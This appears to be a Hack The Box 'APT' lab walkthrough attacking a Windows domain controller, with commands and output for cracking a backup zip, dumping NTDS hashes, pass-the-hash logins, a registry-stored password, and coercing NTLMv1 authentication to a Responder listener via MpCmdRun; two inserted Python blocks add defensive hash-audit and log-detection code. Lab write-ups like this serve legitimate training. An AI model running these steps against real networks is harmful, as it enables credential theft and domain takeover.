APT

Recon
IP address: 10.10.10.213

PORT    STATE SERVICE
80/tcp  open  http
135/tcp open  msrpc

PORT    STATE SERVICE VERSION
80/tcp  open  http    Microsoft IIS httpd 10.0
|_http-title: Gigantic Hosting | Home
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Potentially risky methods: TRACE
135/tcp open  msrpc   Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016 (88%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2016 (88%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

PORT    STATE SERVICE
80/tcp  open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
135/tcp open  msrpc
 
 
Take a look at port 80
Scan for directories
sudo gobuster dir -u http://10.10.10.213 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
No useful directories found.
 
HTTrack Website Copier, google it
Not exploitable.
Check the images for steganography
Nothing.
 
Switch back and look at the other ports
 
googling for 135 MSRPC
export PATH=/usr/share/doc/python3-impacket/examples:$PATH
rpcdump.py 10.10.10.213 -port 135
rpcdump
rpcmap.py ncacn_ip_tcp:10.10.10.213[135]
rpcmap
 
Brute-force the UUIDs and opnums
rpcmap.py ncacn_ip_tcp:10.10.10.213[135] -brute-uuids -brute-opnums
 
99FCFEC4-5260-101B-BBCB-00AA0021347A
googling…
IObjectExporter?
Look at the successful opnums (3 & 5)
Both are the ServerAlive methods.
googling…
Search for OXID resolver
Download it
wget https://raw.githubusercontent.com/mubix/IOXIDResolver/master/IOXIDResolver.py
./IOXIDResolver.py -t 10.10.10.213
It returned the IPv6 address
dead:beef::b885:d62a:d679:573f
Check whether it is reachable
sudo nmap -6 --min-rate 10000 -p- dead:beef::b885:d62a:d679:573f
53,80,88,135,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49669,49670,49675,49695,53837
88 kerberos
5985 windows remote management
47001 winrm; a domain controller is deployed here
The ports at the bottom are all dynamic ports, probably ephemeral services.
 
Start service enumeration
sudo nmap -sT -sC -O -sV -p53,80,88,135,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49669,49670,49675,49695,53837 -6 dead:beef::b885:d62a:d679:573f -oA nmap/v6service
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-server-header:
|   Microsoft-HTTPAPI/2.0
|_  Microsoft-IIS/10.0
|_http-title: Bad Request
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-10-29 15:01:52Z)
135/tcp   open  msrpc         Microsoft Windows RPC
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_ssl-date: 2023-10-29T15:03:03+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after:  2050-09-24T07:17:18
445/tcp   open  microsoft-ds  Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after:  2050-09-24T07:17:18
|_ssl-date: 2023-10-29T15:03:03+00:00; 0s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_ssl-date: 2023-10-29T15:03:03+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after:  2050-09-24T07:17:18
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after:  2050-09-24T07:17:18
|_ssl-date: 2023-10-29T15:03:03+00:00; 0s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Bad Request
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  msrpc         Microsoft Windows RPC
49695/tcp open  msrpc         Microsoft Windows RPC
53837/tcp open  msrpc         Microsoft Windows RPC
No OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94%E=6%D=10/29%OT=53%CT=%CU=%PV=N%DS=1%DC=D%G=Y%TM=653E7428%P=
OS:x86_64-pc-linux-gnu)S1(P=6000{4}28067fXX{32}0035c8a84de4f61758431873a01
OS:22000b389000002040526010303080402080a001def8cff{4}%ST=0.241679%RT=0.276
OS:587)S2(P=6000{4}28067fXX{32}0035c8a917972cc858431874a0122000b2c10000020
OS:40526010303080402080a001defefff{4}%ST=0.340627%RT=0.375607)S3(P=6000{4}
OS:28067fXX{32}0035c8aa85595bf158431875a0122000187000000204052601030308010
OS:1080a001df054ff{4}%ST=0.441347%RT=0.479882)S4(P=6000{4}28067fXX{32}0035
OS:c8ab7344ceb958431876a0122000b444000002040526010303080402080a001df0c9ff{
OS:4}%ST=0.541405%RT=0.595134)S5(P=6000{4}28067fXX{32}0035c8ac868640755843
OS:1877a01220002ef3000002040526010303080402080a001df11bff{4}%ST=0.640609%R
OS:T=0.675501)S6(P=6000{4}24067fXX{32}0035c8adba36bcb4584318789012200092ac
OS:0000020405260402080a001df17fff{4}%ST=0.740609%RT=0.776433)IE1(P=6000{4}
OS:803a7fXX{32}8100cabdabcd00{122}%ST=0.765916%RT=0.859558)TECN(P=602000{3
OS:}20067fXX{32}0035c8ae088813c65843187980522000f1a60000020405260103030801
OS:010402%ST=0.964534%RT=1.00174)EXTRA(FL=12345)

Network Distance: 1 hop
Service Info: Host: APT; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: apt
|   NetBIOS computer name: APT\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: apt.htb.local
|_  System time: 2023-10-29T15:02:55+00:00
|_clock-skew: mean: 0s, deviation: 1s, median: 0s
| smb2-time:
|   date: 2023-10-29T15:02:53
|_  start_date: 2023-10-29T14:30:27
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.40 seconds
Add a local hosts mapping htb.local → the IPv6 address
Look at SMB
sudo smbclient -L //htb.local
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
	backup          Disk
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	SYSVOL          Disk      Logon server share
htb.local is an IPv6 address -- no workgroup available

sudo smbclient //htb.local/backup
smb: \> get backup.zip

Let's look at backup.zip

┌──(root㉿kali1)-[~/Desktop/APT]
└─# unzip -l backup.zip
Archive:  backup.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
        0  2020-09-23 19:40   Active Directory/
 50331648  2020-09-23 19:38   Active Directory/ntds.dit
    16384  2020-09-23 19:38   Active Directory/ntds.jfm
        0  2020-09-23 19:40   registry/
   262144  2020-09-23 19:22   registry/SECURITY
 12582912  2020-09-23 19:22   registry/SYSTEM
---------                     -------
 63193088                     6 files
ntds.dit is the domain controller's equivalent of the SAM
ntds.jfm exists to guard against ntds.dit losing writes

        0  2020-09-23 19:40   registry/
   262144  2020-09-23 19:22   registry/SECURITY
 12582912  2020-09-23 19:22   registry/SYSTEM

These three files are important, but it is unknown whether they differ from the current versions.
 
sudo unzip backup.zip
It requires a password; try cracking it
sudo zip2john backup.zip > hash4backup
john --wordlist=/usr/share/wordlists/rockyou.txt hash4backup
iloveyousomuch (backup.zip)
sudo unzip backup.zip
Next, dump and read the secrets, which can be done directly with secretsdump.py
secretsdump.py -ntds Active\ Directory/ntds.dit -system registry/SYSTEM LOCAL > ../user_hash_raw
The dump yields 8000 lines
 
evil-winrm -i htb.local -u administrator -H '2b576acbe6bcfda7294d6bd18041b8fe'
Failed. Extract all usernames and hashes from the lines containing ':::' into username and hashlist.
cat ../user_hash_raw | grep ':::' | awk -F ':' '{print $1}' >> username
cat ../user_hash_raw | grep ':::' | awk -F ':' '{print $3,$4}' | sed 's/ /:/g' >> hashlist
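The grep/awk pipeline above splits secretsdump's NTDS lines by colon. Added here as a defender-side example (not part of the original writeup, and not impacket code), the Python below parses the same `[DOMAIN\]user:RID:LMhash:NThash:::` format and audits it for the things an AD admin reviewing a leaked backup would want flagged: accounts whose NT hash is the well-known empty-password hash, accounts that still have a real LM hash stored (legacy, trivially crackable), and machine accounts. The dump text is constructed sample data with made-up hashes; only the two empty-password constants are real, publicly documented values.

```python
import re
from dataclasses import dataclass

# Well-known hashes of the empty password (public constants, not from this box).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# secretsdump NTDS credential line: [DOMAIN\]user:RID:LMhash:NThash:::
LINE_RE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)


@dataclass
class Account:
    domain: str
    user: str
    rid: int
    lm: str
    nt: str

    @property
    def findings(self) -> list:
        """Audit findings for this account (empty list means nothing to report)."""
        found = []
        if self.nt == EMPTY_NT:
            found.append("empty-password")
        if self.lm != EMPTY_LM:
            found.append("lm-hash-stored")   # LM storage not disabled for this account
        if self.user.endswith("$"):
            found.append("machine-account")
        return found


def parse_dump(text: str) -> list:
    """Return Account objects for every ':::' credential line, skipping banners and Kerberos keys."""
    accounts = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            accounts.append(Account(m["domain"] or "", m["user"], int(m["rid"]),
                                    m["lm"].lower(), m["nt"].lower()))
    return accounts


def audit(text: str) -> dict:
    """Map user -> findings, for accounts with at least one finding."""
    return {a.user: a.findings for a in parse_dump(text) if a.findings}


# Constructed sample in secretsdump's output format; hashes are fabricated.
SAMPLE = """\
[*] Target system bootKey: 0x0000000000000000000000000000000000
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\\legacy.user:1104:0f0e0d0c0b0a09080706050403020100:fedcba9876543210fedcba9876543210:::
htb.local\\APT$:1000:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
Administrator:aes256-cts-hmac-sha1-96:deadbeef
"""

if __name__ == "__main__":
    for user, findings in audit(SAMPLE).items():
        print(f"{user}: {', '.join(findings)}")
```

The regex anchors on the trailing `:::` and the two 32-hex-digit fields, so Kerberos key lines and the `[*]` banners that secretsdump prints into the same stream are ignored rather than mis-split, which the plain `grep ':::'` does not guarantee for lines that merely contain that substring.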
Enumerate valid users (via Kerberos pre-authentication)
kerbrute userenum -d htb.local --dc htb.local username
2023/11/05 13:40:19 >  [+] VALID USERNAME: Administrator@htb.local
2023/11/05 13:40:19 >  [+] VALID USERNAME: APT$@htb.local
2023/11/05 13:44:14 >  [+] VALID USERNAME: henry.vinson@htb.local
Extracted the three users into user_3
crackmapexec smb htb.local -u user_3 -H backup/hashlist
No luck.
 
get_TGT.sh
#!/bin/bash
# Request a TGT for henry.vinson with each LM:NT pair in hashlist, one per line
while IFS='' read -r LINE || [ -n "${LINE}" ]
do
    echo "------------------"
    echo "Feed the Hash:${LINE}"
    /usr/share/doc/python3-impacket/examples/getTGT.py htb.local/henry.vinson@htb.local -hashes "${LINE}"
done < hashlist

Write a script to request tickets
watch "ls -ltr | tail -2"
Monitor the directory
 
henry.vinson@htb.local.ccache aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb
Found a valid ticket; try it
aad3b435b51404eeaad3b435b51404ee is the empty-password LM hash, so I take the second half, e53d87d42adaa3ca32bdb34a876cbffb
 
evil-winrm -i htb.local -u henry.vinson -H 'e53d87d42adaa3ca32bdb34a876cbffb'
Failed
psexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb.local/henry.vinson@htb.local
[*] Requesting shares on htb.local.....
[-] share 'backup' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'SYSVOL' is not writable.
wmiexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb.local/henry.vinson@htb.local
[*] SMBv3.0 dialect used
[-] rpc_s_access_denied
dcomexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb.local/henry.vinson@htb.local
smbexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb.local/henry.vinson@htb.local
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
Try the registry
reg.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU\\
reg.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU\\Software
This is the name seen earlier on the port 80 website: GiganticHostingManagementSystem
reg.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU\\Software\\GiganticHostingManagementSystem
It reveals the username and password directly: henry.vinson_adm:G1#Ny5@2dvht
Use evil-winrm for lateral movement
evil-winrm -i htb.local -u henry.vinson_adm -p 'G1#Ny5@2dvht'
Logged in successfully

*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
type C:/users/henry.vinson_adm/appdata/Roaming/Microsoft/Windows/PowerShell/PSReadline/ConsoleHost_history.txt
$Cred = get-credential administrator
invoke-command -credential $Cred -computername localhost -scriptblock {Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" lmcompatibilitylevel -Type DWORD -Value 2 -Force}
GPT:
LmCompatibilityLevel defines the authentication mode or network security protocol used between client and server when a session is established. Specifically, an LmCompatibilityLevel value of 2 means:
  • The client does not send LM responses to the server.
  • The server accepts LM, NTLM and NTLMv2 authentication.
  • The server attempts NTLMv2 session security and falls back to NTLM if that fails.
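The history line above shows the registry value being lowered to 2, which is what lets the machine account later answer an outbound SMB connection with NTLMv1. As an added defender-side example (my code, not from the writeup or any tool it uses), the Python below encodes what each LmCompatibilityLevel value permits, per Microsoft's documentation of the `HKLM\SYSTEM\CurrentControlSet\Control\Lsa` value, and runs a simple detection over Security event 4624 records: an NTLM logon whose "Package Name (NTLM only)" field is `NTLM V1` or `LM` is flagged, with machine accounts called out because a DC's own account authenticating with NTLMv1 to another host is exactly the downgrade this box relies on. The events are constructed samples already reduced to dicts with the standard 4624 field names; pulling them from an EVTX or SIEM is assumed to happen elsewhere.

```python
# LmCompatibilityLevel semantics (public Microsoft documentation, not box-specific):
#   0-2: client sends LM and/or NTLM(v1); 3-5: client sends NTLMv2 only
#   0-4: server/DC still accepts NTLM(v1) responses; 5: NTLMv2 only
def client_sends_ntlmv1(level: int) -> bool:
    return level <= 2


def server_accepts_ntlmv1(level: int) -> bool:
    return level <= 4


# Values of the 4624 field "Package Name (NTLM only)" that indicate a weak response
WEAK_PACKAGES = {"LM", "NTLM V1"}


def flag_weak_ntlm_logons(events: list) -> list:
    """Return one alert per 4624 event that authenticated with LM or NTLMv1."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4624:
            continue
        if ev.get("AuthenticationPackageName") != "NTLM":
            continue                      # Kerberos logons carry no NTLM package name
        pkg = ev.get("LmPackageName", "-")
        if pkg not in WEAK_PACKAGES:
            continue
        user = ev.get("TargetUserName", "")
        alerts.append({
            "user": user,
            "package": pkg,
            "source": ev.get("IpAddress", "-"),
            "workstation": ev.get("WorkstationName", "-"),
            # a computer account using NTLMv1 points at a downgraded LmCompatibilityLevel
            "machine_account": user.endswith("$"),
        })
    return alerts


# Constructed sample events (field names follow Security event 4624; values are made up)
SAMPLE_EVENTS = [
    {"EventID": 4624, "TargetUserName": "henry.vinson_adm", "AuthenticationPackageName": "NTLM",
     "LmPackageName": "NTLM V2", "IpAddress": "10.10.14.5", "WorkstationName": "KALI"},
    {"EventID": 4624, "TargetUserName": "APT$", "AuthenticationPackageName": "NTLM",
     "LmPackageName": "NTLM V1", "IpAddress": "10.10.16.2", "WorkstationName": "-"},
    {"EventID": 4624, "TargetUserName": "Administrator", "AuthenticationPackageName": "Kerberos",
     "LmPackageName": "-", "IpAddress": "::1", "WorkstationName": "APT"},
    {"EventID": 4624, "TargetUserName": "svc.legacy", "AuthenticationPackageName": "NTLM",
     "LmPackageName": "LM", "IpAddress": "10.10.14.9", "WorkstationName": "OLDBOX"},
    {"EventID": 4625, "TargetUserName": "APT$", "AuthenticationPackageName": "NTLM",
     "LmPackageName": "NTLM V1", "IpAddress": "10.10.16.2", "WorkstationName": "-"},
]

if __name__ == "__main__":
    for lvl in (2, 5):
        print(f"level {lvl}: client may send NTLMv1={client_sends_ntlmv1(lvl)}, "
              f"DC accepts NTLMv1={server_accepts_ntlmv1(lvl)}")
    for a in flag_weak_ntlm_logons(SAMPLE_EVENTS):
        print("ALERT", a)
```

The failed-logon record (4625) is deliberately left out of the alert list so the count reflects successful weak authentications; a separate rule on 4625 with the same package test would catch attempts. The registry value itself is worth auditing alongside the logs, since level 5 on the DC is what makes `NTLM V1` logons impossible regardless of what a client offers.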
 
Googling…
 
Responder by lgandx, updated May 2, 2024
MpCmdRun.exe can be used to fetch a file
 
git clone https://github.com/lgandx/Responder.git
sudo ./Responder.py -I tun0 --lm -v
Sets a fixed 16-digit challenge
 
 
On the Windows side, run it from the Windows Defender directory
.\MpCmdrun.exe -Scan -scantype 3 -File \\10.10.16.2\nodexist
 
 
./ntlmv1.py --ntlmv1 APT$::HTB:6357C2E21068CA76DAEE4B944CFF3622034580F3BFECBF07:6357C2E21068CA76DAEE4B944CFF3622034580F3BFECBF07:1234567887654321
Hashfield Split: ['APT$', '', 'HTB', '6357C2E21068CA76DAEE4B944CFF3622034580F3BFECBF07', '6357C2E21068CA76DAEE4B944CFF3622034580F3BFECBF07', '1234567887654321']
Hostname: HTB
Username: APT$
Challenge: 1234567887654321
LM Response: 6357C2E21068CA76DAEE4B944CFF3622034580F3BFECBF07
NT Response: 6357C2E21068CA76DAEE4B944CFF3622034580F3BFECBF07
CT1: 6357C2E21068CA76
CT2: DAEE4B944CFF3622
CT3: 034580F3BFECBF07

To Calculate final 4 characters of NTLM hash use:
./ct3_to_ntlm.bin 034580F3BFECBF07 1234567887654321

To crack with hashcat create a file with the following contents:
6357C2E21068CA76:1234567887654321
DAEE4B944CFF3622:1234567887654321

echo "6357C2E21068CA76:1234567887654321">>14000.hash
echo "DAEE4B944CFF3622:1234567887654321">>14000.hash

To crack with hashcat:
./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset 14000.hash ?1?1?1?1?1?1?1?1

To Crack with crack.sh use the following token
$NETLM$1234567887654321$6357C2E21068CA76DAEE4B944CFF3622034580F3BFECBF07
sudo ./Responder.py -I tun0 --lm -v
./ntlmv1.py --ntlmv1 APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
Hashfield Split: ['APT$', '', 'HTB', '95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384', '95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384', '1122334455667788']
Hostname: HTB
Username: APT$
Challenge: 1122334455667788
LM Response: 95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384
NT Response: 95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384
CT1: 95ACA8C7248774CB
CT2: 427E1AE5B8D5CE68
CT3: 30A49B5BB858D384

To Calculate final 4 characters of NTLM hash use:
./ct3_to_ntlm.bin 30A49B5BB858D384 1122334455667788

To crack with hashcat create a file with the following contents:
95ACA8C7248774CB:1122334455667788
427E1AE5B8D5CE68:1122334455667788

echo "95ACA8C7248774CB:1122334455667788">>14000.hash
echo "427E1AE5B8D5CE68:1122334455667788">>14000.hash

To crack with hashcat:
./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset 14000.hash ?1?1?1?1?1?1?1?1

To Crack with crack.sh use the following token
NTHASH:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384